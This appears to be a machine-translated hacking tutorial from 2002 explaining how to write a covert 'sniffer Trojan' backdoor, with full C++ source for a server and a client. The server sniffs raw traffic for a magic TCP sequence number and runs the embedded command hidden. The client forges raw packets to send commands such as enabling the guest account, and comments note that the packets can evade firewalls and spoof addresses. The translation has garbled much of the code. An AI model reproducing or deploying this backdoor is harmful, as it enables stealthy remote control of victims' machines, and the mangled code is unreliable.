Principle of writing original socket Trojan Based on sniffing Principle

Principle of writing original socket Trojan Based on sniffing Principle

Author: refdom

First, let's talk about the features and functions of existing Trojans. Early Trojans were generally based on TCP connections, and their viability is very limited because connection-based Trojans are easily intercepted or discovered. Then there are Trojans that are hidden by changing the protocol, such as using UDP or ICMP or other protocols. Of course, these protocols are usually not commonly used by hosts, therefore, many security configurations require that these protocols be disabled as much as possible, such as ICMP, so that ICMP trojans do not have a chance to survive. Reverse connections or Ack Trojans are very popular, because they are not directly from external TCP connections.

Of course, Trojans are more developed in the hidden aspects, such as injection and core Trojans. However, the focus of this method is not to hide its own processes, but to emphasize communication methods.

One way is to use the original socket Trojan Based on the sniffing principle. Its basic implementation is that the server is an sniffer and package generator, which will capture data packets with specified features. The client is a package generator and sniffer used to send data packets with specified features, including defined commands and receive server data. When the server captures the data packet of the specified feature, it becomes active. By analyzing the data packet, the server obtains the Command sent by the client and the IP address of the client, and then implements the corresponding command, then, the execution result is sent back to the client, and the client's sniffing part receives the corresponding data. All data is sent through the original socket (or correspondingly.

For example, we set a specific protocol or ACK or other bit and Its set as features.

Advantages of this method: the original packet is used for communication based on the non-connection status. Different protocols are related. Any protocol can be used and any specified data packet format can be used, some Hidden addresses can be implemented (completely hidden addresses can be used for non-switched LAN), non-connection reverse communication can be achieved, and even some firewall monitoring can be broken through;

Disadvantages: it is not a reliable data connection, and big data transmission is performed in an unstable manner. For servers with large data traffic, the efficiency of sniffer plays a very important role;

The following is a simple demonstration, which looks like a backdoor. Haha. Although the sparrow is small, the five organs are full. A simple Trojan protocol is defined. Based on the TCP protocol, seq bits are used to identify and execute specified commands instead of based on ports.

Definition:

# Define max_packet_size 65536
# Define seq_identity 12345 // verify whether the required seq value is met. This value does not exist in the normal package!
# Define trojan_id_identity 6789 // verify that the required trojan_id value is met
# Define local_port 1234 // local port. This definition has no practical significance.
# Define server_port 80 // server port. This definition has no practical significance.

Typedef struct ip_hdr // defines the IP Header
{
Unsigned char h_verlen; // 4-bit header length, 4-bit IP version number
Unsigned char TOS; // an 8-bit service type TOS
Unsigned short total_len; // The total length of 16 bits (in bytes)
Unsigned short ident; // 16-bit ID
Unsigned short frag_and_flags; // 3-Bit Flag
Unsigned char TTL; // 8-bit TTL
Unsigned char proto; // 8-bit protocol (TCP, UDP, or other)
Unsigned short checksum; // 16-bit IP header checksum
Unsigned int sourceip; // 32-bit source IP address
Unsigned int destip; // 32-bit destination IP address
} Ip_header, * pip_header;

Typedef struct psd_hdr // defines the TCP pseudo Header
{
Unsigned long saddr; // Source Address
Unsigned long daddr; // Destination Address
Char mbz;
Char ptcl; // protocol type
Unsigned short tcpl; // TCP Length
} Psd_header;

Typedef struct tcp_hdr // defines the TCP Header
{
Unsigned short th_sport; // 16-bit Source Port
Unsigned short th_dport; // 16-bit destination port
Unsigned int th_seq; // 32-bit serial number
Unsigned int th_ack; // 32-bit confirmation number
Unsigned char th_lenres; // 4-bit header length/6-bit reserved words
Unsigned char th_flags; // 6-digit flag
Unsigned short th_win; // 16-bit window size
Unsigned short th_sum; // 16-bit checksum
Unsigned short th_urp; // 16-bit emergency data offset
} Tcp_header, * ptcp_header;

Typedef struct trojan_packet // defines the protocol used by the Trojan
{
Unsigned int trojan_id; // Trojan packet ID, network Sequence
Unsigned short trojan_len; // command execution length, host Sequence
} Trojan_header, * ptrojan_header;

/*
Structure of Trojan data packets

-------------------------------------------------------------
| IP header | TCP Header | Trojan header | Trojan command
-------------------------------------------------------------

The minimum package size is 46 bytes.
*/

# Pragma pack (POP)

Server demo (server. cpp ):

//////////////////////////////////////// ////////////////////////////////////////
//
// Snifftrojan
//
// File: Server. cpp
// Comment: the Server Model
//
// Created at: 2002.9.13
// Created by: refdom
// Email: refdom@263.net
// Home page: www.opengram.com
//
// If you modify the code, or add more functions, please email me a copy.
//
//////////////////////////////////////// ////////////////////////////////////////

/*
Structure of Trojan data packets

-------------------------------------------------------------
| IP header | TCP Header | Trojan header | Trojan command
-------------------------------------------------------------

The minimum package size is 46 bytes.
*/

//////////////////////////////////////// //////////

Void usage ();

Int sniffthread ();

Int sendthread ();

Int decodedata (char * pbuffer );

Unsigned long getlocalip ();

//////////////////////////////////////// //////////

Int main (INT argc, char * argv [])
{
Wsadata;
Int nretcode = 0;

If (wsastartup (makeword (2, 2), & wsadata )! = 0)
{
// Wsastartup error!
Printf ("wsastartup error! % D \ n ", wsagetlasterror ());
Nretcode =-1;
Return nretcode;
}

// Start sniffing data
Sniffthread ();

// Quit
Wsacleanup ();

Return 0;
}

Void usage ()
{
Printf ("************************************* * ************ \ n ");
Printf ("demo for snifftrojan \ n ");
Printf ("\ t written by refdom \ n ");
Printf ("\ t Email: refdom@xfocus.org or refdom@263.net \ n ");
Printf ("\ t homepage: www.xfocus.org or www.opengram.com \ n ");
Printf ("************************************* * ************ \ n ");
}

Int sniffthread ()
{
Int nretcode = 0;
Int nrecvbytes = 0;

Char * pbuffer = NULL;

Socket nsock = invalid_socket;
Sockaddr_in addr_in;

DWORD dwbufferlen [10];
DWORD dwbufferinlen = 1;
DWORD dwbytesreturned = 0;

// Define a raw socket
Nsock = socket (af_inet, sock_raw, ipproto_raw );
If (invalid_socket = nsock)
{
Nretcode =-1;
Goto exit0;
}

Addr_in.sin_family = af_inet;
Addr_in.sin_port = inaddr_any;
Addr_in.sin_addr.s_un.s_addr = getlocalip ();

Nretcode = BIND (nsock, (struct sockaddr *) & addr_in, sizeof (addr_in ));
If (socket_error = nretcode)
{
Printf ("BIND error! % D \ n ", wsagetlasterror ());
Goto exit0;
}

// Socket for sniffer
Nretcode = wsaioctl (nsock, sio_rcvall, & dwbufferinlen, sizeof (dwbufferinlen ),
& Dwbufferlen, sizeof (dwbufferlen), & dwbytesreturned, null, null );
If (socket_error = nretcode)
{
Printf ("wsaioctl error! % D \ n ", wsagetlasterror ());
Goto exit0;
}

// Start sniffing
Pbuffer = (char *) malloc (max_packet_size );
While (1)
{
Memset (pbuffer, 0, max_packet_size );

Nrecvbytes = Recv (nsock, pbuffer, max_packet_size, 0 );
If (socket_error = nretcode)
{
Printf ("Recv error! % D \ n ", wsagetlasterror ());
Goto exit0;
}

If (nrecvbytes <46)
Continue;

Decodedata (pbuffer); // data Decoding

}

Exit0:

If (pbuffer! = NULL)
Free (pbuffer );

If (nsock! = Invalid_socket)
Closesocket (nsock );

Return nretcode;
}

// Obtain the local IP Address
Unsigned long getlocalip ()
{
Char szlocalip [20] =;
Char szhostname [128 + 1] = "";
Hostent * Phe;
Int I;
If (gethostname (szhostname, 128) = 0 ){
// Get host adresses
PHE = gethostbyname (szhostname );
For (I = 0; phe! = NULL & phe-> h_addr_list! = NULL; I ++)
{
Sprintf (szlocalip, "% d. % d ",
(Uint) (uchar *) phe-> h_addr_list) [0],
(Uint) (uchar *) phe-> h_addr_list) [1],
(Uint) (uchar *) phe-> h_addr_list) [2],
(Uint) (uchar *) phe-> h_addr_list) [3]);
}
}
Else
Return 0;

Return inet_addr (szlocalip );
}

Int decodedata (char * pbuffer)
{
Int nretcode = 0;
Char * pcommand = NULL;
Unsigned short uscmdlength = 0;

Pip_header pipheader = NULL;
Ptcp_header ptcpheader = NULL;
Ptrojan_header ptrojanheader = NULL;

Pipheader = (pip_header) pbuffer;

// Only take the TCP packet
If (pipheader-> proto! = Ipproto_tcp)
Goto exit0;

Ptcpheader = (ptcp_header) (pbuffer + sizeof (ip_header ));

// Verify whether the seq value of the TCP packet meets the requirements
If (ntohs (ptcpheader-> th_seq )! = Seq_identity)
Goto exit0;

Ptrojanheader = (ptrojan_header) (pbuffer + sizeof (ip_header) + sizeof (tcp_header ));

// Verify whether the TCP package is a valid Trojan package
If (ntohs (ptrojanheader-> trojan_id )! = Trojan_id_identity)
Goto exit0;

Uscmdlength = ptrojanheader-> trojan_len; // obtain the command Length

If (0 = uscmdlength)
Goto exit0;

Printf ("OK! \ N ");

Pcommand = (char *) malloc (uscmdlength + 1 );
Memset (pcommand, 0, uscmdlength + 1 );

Memcpy (pcommand, pbuffer + sizeof (ip_header) + sizeof (tcp_header) + sizeof (trojan_header), uscmdlength );

Nretcode = winexec (pcommand, sw_hide); // execute the command
If (nretcode> 31)
{
// Winexec successfully!
}

Exit0:

Return nretcode;
}

Client. cpp ):

//////////////////////////////////////// //////////
Void usage ()
{
Printf ("************************************* * ************ \ n ");
Printf ("demo for snifftrojan \ n ");
Printf ("\ t written by refdom \ n ");
Printf ("\ t Email: refdom@xfocus.org or refdom@263.net \ n ");
Printf ("\ t homepage: www.xfocus.org or www.opengram.com \ n ");
Printf ("Usage: client.exe serverip command \ n ");
Printf ("eg: client.exe 192.168.0.2 \" Net user guest/active \ "\ n ");
Printf ("************************************* * ************ \ n ");
}
//////////////////////////////////////// //////////

Int main (INT argc, char * argv [])
{
Int nretcode = 0, ncommandlength = 0;
Char szdatabuf [max_packet_size] =;
Char * pcommand = NULL;

Bool boption;
Wsadata;
Socket nsock = invalid_socket;
Sockaddr_in addr_in;

Ip_header;
Tcp_header;
Psd_header;
Trojan_header;

Usage ();

If (argc! = 3)
{
Printf ("\ narguments error! \ N ");
Return-1;
}

// Obtain the command to be executed
Ncommandlength = strlen (argv [2]);
Pcommand = (char *) malloc (ncommandlength + 2 );
Memset (pcommand, 0, ncommandlength + 2 );
Memcpy (pcommand, argv [2], ncommandlength );

If (wsastartup (makeword (2, 2), & wsadata )! = 0)
{
// Wsastartup error!
Printf ("wsastartup error! % D \ n ", wsagetlasterror ());
Nretcode =-1;
Return nretcode;
}

Nsock = socket (af_inet, sock_raw, ipproto_ip );
If (invalid_socket = nsock)
{
Printf ("socket error! % D \ n ", wsagetlasterror ());
Goto exit0;
}

Nretcode = setsockopt (nsock, ipproto_ip, ip_hdrincl, (char *) & boption, sizeof (boption ));
If (socket_error = nretcode)
{
Printf ("setsockopt error! % D \ n ", wsagetlasterror ());
Goto exit0;
}

// Fill in the IP Header
Ip_header.h_verlen = (4 <4) | (sizeof (ip_header)/sizeof (unsigned long ));
Ip_header.tos = 0;
Ip_header.total_len = htons (sizeof (ip_header) + sizeof (tcp_header ));
Ip_header.frag_and_flags = 0;
Ip_header.ttl = 128;
Ip_header.proto = ipproto_tcp;
Ip_header.checksum = 0;
Ip_header.sourceip = getlocalip (); // Of course, You can forge your own address.
Ip_header.destip = inet_addr (argv [1]); // the IP address of the server. If the IP address is not a switched network, it can be set to the same network instead of the server address.

Or the same as the hub address.

// Fill the TCP Header
Tcp_header.th_sport = htons (local_port); // This port has no practical significance, but can avoid Firewall
Tcp_header.th_dport = htons (server_port); // This port has no practical significance, but can avoid Firewall
Tcp_header.th_seq = htons (seq_identity); // identifies a Trojan on the server.
Tcp_header.th_ack = 345678;
Tcp_header.th_lenres = (sizeof (tcp_header)/4 <4 | 0 );
Tcp_header.th_flags = 0x01; // set the TCP flag at will
Tcp_header.th_wins = 12345;
Tcp_header.th_urp = 0;
Tcp_header.th_sum = 0;

// Fill in the Trojan protocol header
Trojan_header.trojan_id = htons (trojan_id_identity );
Trojan_header.trojan_len = ncommandlength;

// Fill the TCP pseudo header (used to calculate the checksum)
Psd_header.saddr = ip_header.sourceip;
Psd_header.daddr = ip_header.destip;
Psd_header.mbz = 0;
Psd_header.ptcl = ipproto_tcp;
Psd_header.tcpl = htons (sizeof (tcp_header) + sizeof (trojan_header) + ncommandlength );

// Calculate the TCP checksum
Memcpy (szdatabuf, & psd_header, sizeof (psd_header ));
Memcpy (szdatabuf + sizeof (psd_header), & tcp_header, sizeof (tcp_header ));
Memcpy (szdatabuf + sizeof (psd_header) + sizeof (tcp_header), & trojan_header, sizeof (trojan_header ));
Memcpy (szdatabuf + sizeof (psd_header) + sizeof (tcp_header) + sizeof (trojan_header), pcommand, ncommandlength );
Tcp_header.th_sum = checksum (unsigned short *) szdatabuf, sizeof (psd_header) + sizeof (tcp_header) +

Sizeof (trojan_header) + ncommandlength );

// Fill the sending Buffer
Memcpy (szdatabuf, & ip_header, sizeof (ip_header ));
Memcpy (szdatabuf + sizeof (ip_header), & tcp_header, sizeof (tcp_header ));
Memcpy (szdatabuf + sizeof (ip_header) + sizeof (tcp_header), & trojan_header, sizeof (trojan_header ));
Memcpy (szdatabuf + sizeof (ip_header) + sizeof (tcp_header) + sizeof (trojan_header), pcommand, ncommandlength );

Addr_in.sin_family = af_inet;
Addr_in.sin_port = htons (local_port );
Addr_in.sin_addr.s_un.s_addr = inet_addr (argv [1]);

// Send command
Printf ("start to send command... \ n ");
Nretcode = sendto (nsock, szdatabuf,
Sizeof (ip_header) + sizeof (tcp_header) + sizeof (trojan_header) + ncommandlength,
0, (struct sockaddr *) & addr_in, sizeof (addr_in ));
If (socket_error = nretcode)
{
Printf ("sendto error! % D \ n ", wsagetlasterror ());
Goto exit0;
}

Printf ("Send OK! \ N ");

Exit0:

If (pcommand! = NULL)
Free (pcommand );

If (nsock! = Invalid_socket)
Closesocket (nsock );

Wsacleanup ();

Return 0;
}